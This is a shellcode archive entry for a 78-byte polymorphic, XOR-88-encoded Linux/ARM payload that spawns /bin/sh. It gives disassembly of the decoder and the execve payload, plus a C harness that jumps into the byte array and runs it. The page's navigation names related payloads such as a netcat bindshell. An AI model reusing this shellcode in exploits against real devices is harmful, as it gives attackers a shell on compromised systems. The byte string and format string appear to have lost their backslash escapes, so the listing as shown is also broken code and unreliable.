[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/ARM - Polymorphic execve("/bin/sh", ["/bin/sh"], NULL); - XOR 88 encoded -
# Published : 2010-07-03
# Author :
# Previous Title : Linux x86 netcat bindshell port 8080 - 75 bytes
# Next Title : Linux/x86-64 - Add root user with password - 390 bytes
/*
Title: Linux/ARM - Polymorphic execve("/bin/sh", ["/bin/sh"], NULL); - XOR 88 encoded - 78 bytes
Date: 2010-06-28
Tested on: ARM926EJ-S rev 5 (v5l)
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/jonathansalwan
! Database of shellcodes http://www.shell-storm.org/shellcode/
== Disassembly of XOR decoder ==
00008054 <debut-0x8>:
8054: e28f6024 add r6, pc, #36 ; 0x24
8058: e12fff16 bx r6
0000805c <debut>:
805c: e3a040e3 mov r4, #227 ; 0xe3
00008060 <boucle>:
8060: e3540c01 cmp r4, #256 ; 0x100
8064: 812fff1e bxhi lr
8068: e24440e3 sub r4, r4, #227 ; 0xe3
806c: e7de5004 ldrb r5, [lr, r4]
8070: e2255058 eor r5, r5, #88 ; 0x58
8074: e7ce5004 strb r5, [lr, r4]
8078: e28440e4 add r4, r4, #228 ; 0xe4
807c: eafffff7 b 8060 <boucle>
8080: ebfffff5 bl 805c <debut>
== Disassembly of execve("/bin/sh", ["/bin/sh"], NULL) ==
00008054 <_start>:
8054: e28f6001 add r6, pc, #1 ; 0x1
8058: e12fff16 bx r6
805c: 4678 mov r0, pc
805e: 300a adds r0, #10
8060: 9001 str r0, [sp, #4]
8062: a901 add r1, sp, #4
8064: 1a92 subs r2, r2, r2
8066: 270b movs r7, #11
8068: df01 svc 1
806a: 2f2f cmp r7, #47
806c: 6962 ldr r2, [r4, #20]
806e: 2f6e cmp r7, #110
8070: 6873 ldr r3, [r6, #4]
*/
#include <stdio.h>
char SC[] = "x24x60x8fxe2"
"x16xffx2fxe1"
"xe3x40xa0xe3"
"x01x0cx54xe3"
"x1exffx2fx81"
"xe3x40x44xe2"
"x04x50xdexe7"
"x58x50x25xe2"
"x04x50xcexe7"
"xe4x40x84xe2"
"xf7xffxffxea"
"xf5xffxffxeb"
"x59x68xd7xba"
"x4bxa7x77xb9"
"x20x1ex52x68"
"x59xc8x59xf1"
"xcax42x53x7f"
"x59x87x77x77"
"x3ax31x36x77"
"x2bx30";
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(SC));
(*(void(*)()) SC)();
return 0;
}